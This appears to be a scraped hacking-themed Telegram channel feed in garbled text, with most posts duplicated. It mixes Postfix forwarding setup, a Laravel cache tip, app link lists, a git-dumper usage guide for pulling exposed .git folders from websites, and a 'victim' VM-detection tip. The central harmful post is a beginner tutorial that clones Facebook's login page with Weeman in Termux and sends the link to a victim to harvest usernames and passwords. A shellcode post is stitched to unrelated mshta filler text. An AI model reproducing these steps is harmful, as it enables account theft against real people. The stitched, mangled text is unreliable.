β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Postfix mail forwarding
Postfix is the most commonly used MTA program that can deliver, receive, or route emails. So, if you want to forward emails with your server and domain then using the postfix program, you can set up email forwarding configurations on the domain like kbuzdar@mydomain.com. This article will guide you about how to set up a postfix mail forwarding method on the CentOS server. For all other distributions like Ubuntu and Debian, almost all the steps are the same.
1) Install Postfix
First, ensure that postfix is installed on your system or not.using the following command you can check the installation of postfix:
rpm -qa | grep postfix2) Otherwise, you will install postfix using the following command:
$ sudo dnf install postfix
Once the installation of postfix is complete, now using the following command, you can check the postfix service status:
$ sudo service postfix status
The following output should display on your system.
3) As you can see in the above screenshot, postfix services are active on this system. Now, we can further verify with the help of netstat command that postfix services are running on port 25. Type the following command to do this:
sudo netstat -ltnp | grep 254) Configuration for postfix email forwarding
Now, start the configuration of postfix for forwarding emails. It is a simple task. First, we need to find the postfix configuration directory path by using the postconf command.
postconf | grep config_directory5) Now, we have an idea that all postfix configuration files located in the directory /etc/postfix, so move inside the directory and edit the βmain.cfβ configuration file.
Open the file in your favorite text editor or which is installed on your system. Here, we are using a vim editor to modify the configuration files.
$ vi /etc/postfix/main.cf
6) Now, you need to add the following lines at the end of the βmain.cfβ file.
= mydomain.com theanotherdomain.com7) Reload the postfix
virtual_alias_maps = hash:/etc/postfix/virtual
After doing some necessary changes in the postfix configuration files, reload or restart the postfix configurations by using the following command:
sudo /etc/init.d/postfix reload@UndercodeTesting
# or
$ sudo service postfix reload
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK FACEBOOK VIA TERMUX :
#ForBeginers :
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt update && upgrade
Now give permission to Termux to access your memory
So type below command
2) termux-setup-storage
Then type this command to install python2
3) pkg install python2
During installation of python2 you will be asked " Termux will use some space"
4) Just type Y and hit enter
Now you have to install git, for that type this command
5) pkg install git
After successfully installing git, type below command to
6) install Weeman
7) git clone https://github.com/evait-security/weeman.git
After that type this command
8) cd weeman && ls
Now you have to type below command to run Weeman on Python
9) python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
10) ifconfig
11) Now you got your IP address, now type below commands to get started
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
12) How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Setting up weeman in termux
that's all you have successfully executed all the commands to hack Facebook
Now you have to share your IP with your victim to get his username and password
12) so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
#forbeginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - evait-security/weeman: HTTP server for phishing in python
HTTP server for phishing in python. Contribute to evait-security/weeman development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravelβs cache.
You know by default Laravel uses the file cache driver. You want to use a speedier cache.
2) Use the Memcached cache driver.
Edit app/config/cache.php and change the driver to βmemcachedβ.
'driver' => 'memcached',
3) If you have multiple memcached servers, or theyβre running on something other than the local machine, youβll have to edit the memcached section of app/config/cache.php
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Setting up the Memcached Cache Driver :
for gain some speed
1) You want to speed up Laravelβs cache.
You know by default Laravel uses the file cache driver. You want to use a speedier cache.
2) Use the Memcached cache driver.
Edit app/config/cache.php and change the driver to βmemcachedβ.
'driver' => 'memcached',
3) If you have multiple memcached servers, or theyβre running on something other than the local machine, youβll have to edit the memcached section of app/config/cache.php
#fastTips
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 ANDROID VIDEO EDITORS APPS :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦2020 ANDROID VIDEO EDITORS APPS :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Filmora: AI Video Editor&Maker - Apps on Google Play
AI Video EditorοΌAI Music, Text to Video,Text to Speech,Auto Caption,Video Effect
Forwarded from UNDERCODE NEWS
Musk recently used three little pigs to highlight his new brain-computer interface technology
#technologies
#technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A #tool to dump a git repository from a website.
1) git clone https://github.com/arthaud/git-dumper.git?
2)cd git-dumper
3) pip install -r requirements.txt
4) ./git-dumper.py http://website.com/.git ~/website
F E A T U R E S :
-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);
-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;
-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;
-Fetch all objects recursively, analyzing each commits to find their parents;
-Run git checkout . to recover the current working tree
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A #tool to dump a git repository from a website.
1) git clone https://github.com/arthaud/git-dumper.git?
2)cd git-dumper
3) pip install -r requirements.txt
4) ./git-dumper.py http://website.com/.git ~/website
F E A T U R E S :
-Fetch all common files (.gitignore, .git/HEAD, .git/index, etc.);
-Find as many refs as possible (such as refs/heads/master, refs/remotes/origin/HEAD, etc.) by analyzing .git/HEAD, .git/logs/HEAD, .git/config, .git/packed-refs and so on;
-Find as many objects (sha1) as possible by analyzing .git/packed-refs, .git/index, .git/refs/* and .git/logs/*;
-Fetch all objects recursively, analyzing each commits to find their parents;
-Run git checkout . to recover the current working tree
β
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
A tool to dump a git repository from a website. Contribute to arthaud/git-dumper development by creating an account on GitHub.
48718.c
1.9 KB
#dangerous shellCode
β Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β Tested on: WIN7x86
β Date: 2020-06-16
β Shellcode Title: Windows/x86 Download using mshta.exe Shellcode (100 bytes)
β Shellcode Author: Siddharth Sharma
--- Shellcode Length: ~100 bytes
β Tested on: WIN7x86
β Date: 2020-06-16
π¦THE RECENT SHELLCODE HERE CAN USE MSHTA FOR AUTO DOWNLOAD WITHOUT AUTORIZATION...
- SO what is Mshta.exe
-How to Download Mshta.exe and Fix EXE Error Messages
1) EXE files such as mshta.exe are categorized as Win32 EXE (Executable application) files. As a Microsoft (R) HTML Application host file, it was created for use in Internet Explorer by Microsoft.
2) The release of mshta.exe introduced for Windows was on 11/08/2006 in Windows Vista. The most recent release for Microsoft Office Access 2010 14 launched on 07/04/2011 [version 11.00.16299.371 (WinBuild.160101.0800) release]. Mshta.exe is included in Windows 10, Windows 8.1, and Windows 8 versions.
mshta.exe Runtime Errors
3) Runtime errors are Microsoft Office Access 2010 errors that occur during "runtime". Runtime is pretty self-explanatory; it means that these EXE errors are triggered when mshta.exe is attempted to be loaded either when Microsoft Office Access 2010 is starting up, or in some cases already running. Runtime errors are the most common form of EXE error you will encounter using Microsoft Office Access 2010.
4) In most cases, mshta.exe runtime errors occurring while the program is running will result in the program terminating abnormally. Most of these mshta.exe error messages mean that Microsoft Office Access 2010 was either unable to locate this file on startup, or the file is corrupt, resulting in a prematurely-aborted startup process. Generally, Microsoft Office Access 2010 will be unable to start without resolving these errors.
by microsoft
β β β Uππ»βΊπ«Δπ¬πβ β β β
- SO what is Mshta.exe
-How to Download Mshta.exe and Fix EXE Error Messages
1) EXE files such as mshta.exe are categorized as Win32 EXE (Executable application) files. As a Microsoft (R) HTML Application host file, it was created for use in Internet Explorer by Microsoft.
2) The release of mshta.exe introduced for Windows was on 11/08/2006 in Windows Vista. The most recent release for Microsoft Office Access 2010 14 launched on 07/04/2011 [version 11.00.16299.371 (WinBuild.160101.0800) release]. Mshta.exe is included in Windows 10, Windows 8.1, and Windows 8 versions.
mshta.exe Runtime Errors
3) Runtime errors are Microsoft Office Access 2010 errors that occur during "runtime". Runtime is pretty self-explanatory; it means that these EXE errors are triggered when mshta.exe is attempted to be loaded either when Microsoft Office Access 2010 is starting up, or in some cases already running. Runtime errors are the most common form of EXE error you will encounter using Microsoft Office Access 2010.
4) In most cases, mshta.exe runtime errors occurring while the program is running will result in the program terminating abnormally. Most of these mshta.exe error messages mean that Microsoft Office Access 2010 was either unable to locate this file on startup, or the file is corrupt, resulting in a prematurely-aborted startup process. Generally, Microsoft Office Access 2010 will be unable to start without resolving these errors.
by microsoft
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from WEB UNDERCODE - PRIVATE
Memory Injection like a Boss.pdf
331.5 KB
Forwarded from UNDERCODE NEWS
Tracking: A new generation of high-precision Beidou home-made positioning chip unveiled for high-precision positioning
#technologies
#technologies
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME 2020 BITCOIN EARNING APPS :
https://play.google.com/store/apps/details?id=bitcoin.blockchain.game
https://itunes.apple.com/app/blockchain-game/id1073324612
https://play.google.com/store/apps/details?id=in.sweatco.app&hl=en
https://play.google.com/store/apps/details?id=io.lawnmower.mobile
https://itunes.apple.com/app/apple-store/id965079226
https://play.google.com/store/apps/details?id=bitcoin.alien.run
https://itunes.apple.com/us/app/alien-run-free-bitcoin/id1161356630
https://play.google.com/store/apps/details?id=com.claimyourbits.btcsafari
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SOME 2020 BITCOIN EARNING APPS :
https://play.google.com/store/apps/details?id=bitcoin.blockchain.game
https://itunes.apple.com/app/blockchain-game/id1073324612
https://play.google.com/store/apps/details?id=in.sweatco.app&hl=en
https://play.google.com/store/apps/details?id=io.lawnmower.mobile
https://itunes.apple.com/app/apple-store/id965079226
https://play.google.com/store/apps/details?id=bitcoin.alien.run
https://itunes.apple.com/us/app/alien-run-free-bitcoin/id1161356630
https://play.google.com/store/apps/details?id=com.claimyourbits.btcsafari
enjoyβ€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#infoguatering How can I check if the victim Linux
is a Linux system is running on a physical or virtual machine?
1) Check if the server is physical or virtual
The easiest way to check this is to use the dmidecode command.
> sudo dmidecode -s system-manufacturer
2) If it is a physical system, you should see the manufacturer's name such as Dell, Lenovo, etc.
If it's a virtual system, you should see output like QEMU, innotek Gmbh (for VirtualBox).
3) The dmidecode command is used to decode the computer's DMI information into a human readable format.
4) DMI, short for Desktop Management Interface, is a standard followed by (almost) all system manufacturers. DMI is used to manage and monitor components on a desktop, laptop, or server computer.
5) With DMI, you can get information about the system hardware, system manufacturer, and device serial number.
6) The dmidecode (DMI Decode) command retrieves this s system-manufacturer information and provides information about the system manufacturer.
7) If your system is real, you should see the manufacturer's name:
> destroyer@andreyex:~$ sudo dmidecode -s system-manufacturer
8) If it is a virtual machine, the information will be reflected accordingly.
> root@localhost:~# dmidecode -s system-manufacturer
9) It was fast, wasn't it? You can refer to the dmidecode command man page to see the keywords you can use to extract more information.
10) If you want to check the Linux version information, you will have to use the uname command, because dmidecode is all about hardware details.
Hopefully this article helped you determine if your Linux server is running in a virtual machine or a physical machine.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#infoguatering How can I check if the victim Linux
is a Linux system is running on a physical or virtual machine?
1) Check if the server is physical or virtual
The easiest way to check this is to use the dmidecode command.
> sudo dmidecode -s system-manufacturer
2) If it is a physical system, you should see the manufacturer's name such as Dell, Lenovo, etc.
If it's a virtual system, you should see output like QEMU, innotek Gmbh (for VirtualBox).
3) The dmidecode command is used to decode the computer's DMI information into a human readable format.
4) DMI, short for Desktop Management Interface, is a standard followed by (almost) all system manufacturers. DMI is used to manage and monitor components on a desktop, laptop, or server computer.
5) With DMI, you can get information about the system hardware, system manufacturer, and device serial number.
6) The dmidecode (DMI Decode) command retrieves this s system-manufacturer information and provides information about the system manufacturer.
7) If your system is real, you should see the manufacturer's name:
> destroyer@andreyex:~$ sudo dmidecode -s system-manufacturer
8) If it is a virtual machine, the information will be reflected accordingly.
> root@localhost:~# dmidecode -s system-manufacturer
9) It was fast, wasn't it? You can refer to the dmidecode command man page to see the keywords you can use to extract more information.
10) If you want to check the Linux version information, you will have to use the uname command, because dmidecode is all about hardware details.
Hopefully this article helped you determine if your Linux server is running in a virtual machine or a physical machine.
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β